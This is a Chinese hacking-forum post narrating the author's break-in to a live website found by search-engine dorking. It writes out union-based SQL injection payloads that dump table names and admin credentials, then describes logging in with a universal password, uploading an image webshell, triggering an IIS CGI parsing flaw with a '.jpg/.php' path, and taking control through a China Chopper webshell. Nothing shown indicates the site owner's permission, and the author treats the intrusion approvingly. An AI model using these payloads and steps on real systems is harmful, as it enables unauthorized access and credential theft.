电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 2674 人浏览分享

被上了一课,奇怪的网站getshell全过程!

[复制链接]
2674 0
0X00

闲话少说了直接开始正题。
在使用谷歌语法寻找网站的时候遇到了一个比较
http://xxxxxx.php?id=94
标准的id=94 既然已经遇到了 那么相遇就是缘分 自然少不了被测试一遍。
直接 一个单引号  测试是字符型 还是数字型。
传入一个简单的单引号后 页面也是直接报错 那么这个地方肯定就是存在SQL注入的。

7f8d100a74022eccd6f04c823d2122f1_27983.png

于是 熟悉的order by1正常

3e73f8c7bb8af998e8e904be17bb72b6_63165.png

Order by 2 直接报错 居然只有一个表

19.png

回显点只有一个 那就直接输入 and 1=2 union select database() 数据库直接出现

18.png

知道库名以后直接输入表名
And 1=2 union select group_concat(table_name) from informat
ion_schema.tables where table_schema=database()

17.png

出现了tab_admin 这个表查询这个表里面的字段
And 1=2 union select group_concat(column_name) from information_sch
ema.columns where table_name=”tab_admin”

16.png

知道字段以后肯定是想要知道里面的数据
And 1=2 union select username from tab_admin

15.png

And 1=2 union select password from tab_admin

14.png

当知道管理的账户和密码就是想要进入后台看一看(只是看一看哈)
直接使用御剑后台扫描来检测
http://xxxxxx/login.php

13.png

0x01

然后就这样登陆这个网站的后台,如果我自己的眼光与技术已经到这里结束了
感谢Wenz 兄弟的提醒 还是要检查一下后台有没有GETshell的可能。

12.png

万能密码在这里居然也可以使用(简直比靶场还要靶场。。。)

11.png

发现一个可以上传照片的功能,图片马直接安排
(这里 一定不能点 提交 点击提交后就会直接发布在目标的网站)

10.png

在burp里面把后缀改成php,放包 一个弹窗发现是白名单 只能上传JPG,NPG等图片格式!

9.png

8.png

是IIS 8.5的版本 所以IIS6.0的三个畸形解析漏洞一直没有考虑 也忘记了威力强大的CGI解析漏洞。
在这里被上了一课 渗透测试一定要去测试所有可能。
随后想起来00截断 但是经过测试也是不能成功,本以为已经到此位置了。
再次经过Wenz兄弟的提醒 想起来了CGI解析漏洞。
因为这个网站

7.png

之后就是直接上传一张图片马 这里把图片马上传到他的服务器后一定不要点击 提交 按钮。
点击提交就会直接发送到他的网站首页上面。

6.png

把图片的地址复制一下 然后在后面加上/.php 这个CGI的解析漏洞就出现了
http://xxxxxxx53961.jpg/.php?a=phpinfo();

5.png

到这里就是可以直接连接菜刀 成功拿到了webshell

4.png

在经过看wwwroot目录的时候发现这是一个站群

3.png

Cmd看一下权限是一个最低的权限 而且本机一个补丁也没有打 看来也是一个没有经历过社会毒打的人。

2.png

对这个站的渗透也到此结束如果再进行提权就是违规渗透,这是不能允许的。

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.